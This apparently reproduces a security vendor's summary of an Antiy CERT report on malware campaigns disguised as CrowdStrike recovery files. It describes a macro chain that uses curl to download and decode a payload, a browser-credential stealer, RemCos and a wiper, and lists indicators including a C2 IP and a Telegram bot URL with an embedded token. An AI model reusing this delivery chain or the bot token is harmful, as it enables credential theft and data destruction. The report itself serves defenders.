Threat Research

Analysis Of Attack Activities Disguised As CrowdStrike Repair Files

Securonix

Antiy CERT linked CrowdStrike’s blue-screen incident to the spread of RemCos, a secret-stealing Trojan, and a wiper data eraser. The report details decoy blue-screen recovery documents, LNK/Docm macro delivery, and phishing campaigns (including a Handala Hack operation) with C2 communication and related indicators. #RemCos #AutoIt #HandalaHack #CrowdStrike #Wiper

Keypoints

  • The incident involved multiple malicious codes used to capitalize on CrowdStrike’s BSOD event, including RemCos remote control, a secret-stealing Trojan, and a wiper.
  • Attack Activity 1 used a shortcut file and a malicious macro in a Word document to drop a secret-stealing DLL (mscorsvc.dll) after decoding/downloading payloads.
  • Initial bait documents mimic CrowdStrike recovery content and leverage macro code to download and execute the final payload via rundll32.
  • Attack Activity 2 from Handala Hack used phishing emails with attachments and malicious links leading to a wiper (CrowdStrike.exe) delivered via update.zip.
  • The malicious documents and payloads include explicit file names, MD5s, sizes, and indicators such as a Base64-encoded payload and AutoIt components.
  • Indicators of Compromise include specific file names (e.g., y_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.lnk, New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm), MD5 hashes, a C2 IP, and a Telegram bot URL used for C2 relays.
  • Defensive notes: Antiy’s AVL SDK and related security products can detect and remove these threats; the report emphasizes awareness and defense against such opportunistic attacks.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The campaign uses phishing emails with attachments to deliver malware. Quote: “The phishing email contains two attachments, namely CSfooter.png and update1.pdf.”
  • [T1566.002] Phishing: Spearphishing Link – A malicious link in a PDF leads to a download of a payload. Quote: “The PDF file contains a hyperlink named ‘Download The Updater’. When the user clicks the hyperlink, a compressed file named ‘update.zip’ will be downloaded, which contains a malicious program named ‘CrowdStrike.exe’.”
  • [T1023] Shortcut Modification – Initial payloads use LNK files pointing to a macro-enabled document. Quote: “The target location of the shortcut file pointed to a document named ‘New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm’.”
  • [T1204.002] User Execution: Malicious File – Opening the decoy document with malicious macro triggers payload deployment. Quote: “After opening the document with malicious macro code, the content in the document is ‘Microsoft official document on how to fix blue screen events’.”
  • [T1059.003] Windows Command Shell – The macro uses the curl tool via command-line to fetch payloads. Quote: “copies the curl tool in the system to the %temp% directory, uses the tool to download the ‘payload2.txt’ file from the specified URL, decodes it with Base64, and saves it as the %temp%mscorsvc.dll file.”
  • [T1055] Process Injection – The final payload is injected into memory for execution. Quote: “injects the final payload into the memory for execution.”
  • [T1555.003] Credentials from Web Browsers – The secret-stealing Trojan extracts browser data and exfiltrates it. Quote: “The secret-stealing Trojan steals sensitive data from browsers such as Chrome, Edge, and Firefox, stores the stolen data in the C:WindowsTemp path, and eventually transmits the stolen data back to the C2 server.”
  • [T1041] Exfiltration Over C2 Channel – Stolen data is transmitted to the C2 server. Quote: “transmits the stolen data back to the C2 server.”
  • [T1485] Data Destruction – The Handala Hack operation includes a wiper that erases data. Quote: “a data eraser named ‘wiper’.”

Indicators of Compromise

  • [File name] IO: y_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.lnk, New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm, CrowdStrike.exe
  • [MD5] IO: EB29329DE4937B34F218665DA57BCEF4, DD2100DFA067CAAE416B885637ADC4EF, and 2 more hashes
  • [IP address or URL] IO: 172.104.160.126, hxxps://api.telegram[.]org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126

Read more: https://www.antiy.cn/research/notice&report/research_report/Disguise_CrowdStrike_Trojan.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint